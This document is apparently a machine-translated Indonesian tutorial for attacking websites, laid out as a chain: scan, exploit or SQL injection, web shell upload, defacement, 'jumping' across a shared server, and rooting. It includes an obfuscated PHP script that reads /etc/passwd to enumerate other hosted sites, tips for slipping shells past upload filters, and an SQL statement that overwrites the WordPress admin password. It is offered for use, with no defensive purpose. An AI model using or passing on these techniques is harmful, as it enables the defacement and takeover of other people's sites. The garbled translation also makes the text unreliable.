Web Attack

Picture of Web Attack:

Scan => XPL / sqli => Upload Shell => Deface / jumping => Rooting

1. Scan

Look for tau where situation weakness of goals web. Can in pake scan some scanner tool. most famous between:

Acunetix Windows

Nikto Linux

Besides can get our bug also with that tool will be able to collect information good for from goals web

2. XPL / sqli

After we earn to find data of goals web. We try searching of is way of for the meng-Exploitasi of bug-bug we which have find with mentioned scanner tool. Hereunder enlist situs providing kinds of Exploit

Exploit Database

Packet Storm

Inj3Ct0R

Hack0Wn

If goals use CMS Joomla / wordpress, we earn to look for Exploit for plugin-plugin which in using goals web. Because with scanner tool above us given by information of will goals web have in surgical operation of all. Become soybean cake us fill folder of goals web, including plugin-plugin any kind of which is used

If technique of SQLI earn in seeing here:

Ebook along with website sourc for the practice of technique of SQLI donlot here

3. Upload Shell

Website have in Exploitasi and us have stepped into page yard of admin. Remain us of upload shell'a now

- Shell Upload in Wordpress can thema or plugin mengupload which have been inserted file of shell'a

- Shell Upload in is same Joomla also, merely can also use Plugin Ninja Explorer

- Upload Shell in ordinary CMS can pass menu of upload picture, if not can try shell'a in rename become last shell.php.jpg of upload

After success shell in upload remain to call situation of URL shell'a where

4. Deface Or Jumping

If pengen of styles of an Deface, file searching of index.php last of file fox in dalam'a with Deface script which our. To lazy make deface scrip can use tool Defacemaker. Try website kan arshive we which have deface in situs

- Indonesian Defacer

- Magelang Cyber

- Zona-H

Insufficient only can men-Deface one just web. Try to use technique of jumping to step into web which is one is same server of web we which have deface. way of?

Script Jumping

Code:

$x15="\x61rray\137\x70\165\x73h"; $x16="f\x65\157\146"; $x17="fgets"; $x18="\146\x6f\160\145\156"; $x19="in\x69\137g\145\164"; $x1a="is\x5f\x72\145ad\141b\154e"; $x1b="\x73\x65t_t\151\155\x65\137li\155\x69t"; $x1c="\x73\x74\162\x70\157\163"; $x1d="\163\165b\x73t\x72";

($x0b = $x19('safe_mode') == 0) ? $x0b = 'off': die('<b>Error: Safe Mode is On</b>');$x1b(0);@$x0c = $x18('/etc/passwd','r');if (!$x0c) { die('<b> Error : Can Not Read Config Of Server </b>'); }$x0d = array();$x0e = array();$x0f = array();$x10 = 0;echo "\074b>\x3cfo\x6e\x74\040fa\x63\x65=\126\x65\x72\x64an\141\x20s\151\x7a\x65\075\x33 c\157\154\157\x72\x3d\x54\x65\141\x6c>\x20\123\x65\x72\166\145\x72 \x4a\x75\155\160in\x67\x20\x46\x69\x6ed\145\162 \126er\x73ion\x201.\x30\x20<\057f\157\x6et\x3e<\x2f\x62\x3e<\142\x72\040\x2f\x3e";echo "<font \146\x61\x63\145\075V\145rd\x61\x6ea s\x69\172\x65=\x32 \x63\x6fl\x6f\162\075Ma\162\x6fo\x6e\x3eC\x72\x65at\145d \x42\x79\040\x58\141\144\160\x72ito\170 \x2c \0620\061\x30,\040\124\141\156\x67\145r\x61\x6e\147 <\057\x66\157\156\x74\076\074b\x72\040\x2f>";echo "\074\142\162\x20\057\076";echo "<\142>\x3c\146o\156t\x20\146\141\x63\145=V\145\x72\144\141\x6ea \x73\x69z\x65=\062\076\104ed\x69\143\141\164\x65\144\x20\124o\x20H\141c\x6b\145\162-\103\151\x73\141\x64\141\x6e\x65\x2e\x4fr\147\x20<\x2f\146\157n\164\076\074\x2f\142><\x62\x72 \x2f>";echo "\x3c\x66o\x6e\164\040f\141\143e\x3d\126\x65\162\x64\141n\x61\040\163\151z\x65\x3d\x32\040\x63\157l\157\162\075\x4d\x61ro\157\156>\040\124ha\156ks\x20To\x20#\x20\104\145v\151\x6c\172c\060\x64\x65 \043\040\110\141c\x6be\x72\040\116e\167\x62\x69\145\x20\x23 \130\103\x6f\x64\145 \043 \112a\163a\153om \x23\x20\105\143h\x6f\040\043\040\x59\103L\x20#\x20\x49\x6e\144\x6fn\145sia\x6e\x20\103\x79b\x65r \x23\040\x61\x6ed\040\x61l\x6c\x20Hack\x65\x72\040F\157\162\x75\155\040\111\x6e In\144o\x6ee\x73\x69\141 <\057\x66\x6f\x6e\x74\x3e<\x62r /\x3e";echo "\x3c\x62r /\x3e";echo "<f\x6fnt\x20\146\x61\143\x65\x3d\126\x65\162\144a\156a \163iz\145=2\x20c\x6f\154\157\162\075\x4d\x61ro\157n\076 \x4f\x6b\054\x20L\x65\x74'\x73 B\x65g\x69n \x2e\x2e\056\x20\x3c/\x66\x6f\x6et><b\x72\x20\x2f\076";echo "\x3c\x66\x6fnt\x20f\141\143\145=\126er\144a\x6ea\x20\x73i\x7ae=\062 c\x6f\x6c\x6fr=\x54\x65al>\x2a\052\052*\052\x2a\x2a**\052\052\052\x2a***\x2a*\x2a\052\x2a\x2a**\052\x2a*\x2a\052\052\052\052**\052***\x2a*\x2a*\x2a\052*<\x2f\146\157\156t\076\x3c\142r\x20/>";while(!$x16($x0c)){$x11 = $x17($x0c);if ($x10 > 35){$x12 = $x1c($x11,':');$x13 = $x1d($x11,0,$x12);$x14 = '/home/'.$x13.'/public_html/';if (($x13 != '')){if ($x1a($x14)){$x15($x0e,$x13);$x15($x0d,$x14);echo "\x3c\x66on\164\x20f\141\x63\x65\x3dVe\162da\156\141\x20\163\x69ze\0752\040co\154\x6f\x72=\x52\145\x64\x3e[F\x6f\x75\156d\x20\041\135 $x14\074/\x66\157n\x74\x3e";echo "<\142\x72/\x3e";}}}$x10++;}echo "\074\x66on\x74 \146\141ce\075\x56e\x72\x64\141\x6e\141\040\x73\151z\x65\075\062 \x63\x6flo\162\x3d\124\145\x61\154\076\x2a\x2a\x2a\052\x2a*\052\052*\x2a\052*\x2a*\052\x2a*\052**\052*\x2a**\052\x2a\x2a**\052*\052\x2a\052\x2a\052**\052**\x2a\x2a\052</font\076<b\x72\x20\057\x3e";echo "\x3cb\162 /\076";echo "<\146\157\x6et\x20\x66\x61\x63\x65\x3dV\x65\162\x64a\x6e\x61 \163\151\x7a\145=\062\040c\157l\157\x72=M\141\x72\157\x6f\156\076\x54\x68an\x6bs \106\x6fr \125\x73\x69n\x67 \x54\150\x69s S\151m\160\x6c\x65\x20\124\x6f\x6f\x6c\x73.\040 \x5e_\x5e\074\057\146\157\x6et\x3e\074b\162 \x2f\076";echo "\074f\157\156t\x20\x66\141ce=V\x65rd\x61\156a\040\163\x69\172\145\x3d\062\076<\057\x66ont\x3e";echo "<f\157n\164\040f\x61\143\145\x3d\126e\162dana\040\163iz\145=\x32\x3e\074/\146\157\156t>";

- Upload script jumping'a

- Rename jadi jumpingfinder.php

- Panggil letak URL file tersebut

- Masuk ke public_html web target

- Masuk ke MySQL'a (cari acount MySQL di file config)

- Cari table user

- Update Password user admin

Under this there is special script for the update of admin password user :

# Wordpress

PHP Code:

UPDATE `note_wrdp1`.`wp_users` SET `user_pass` = '$P$BdEAI5H.T0REbjjKME506zOW03nggb0' WHERE `wp_users`.`ID` = 1 LIMIT 1;

User : admin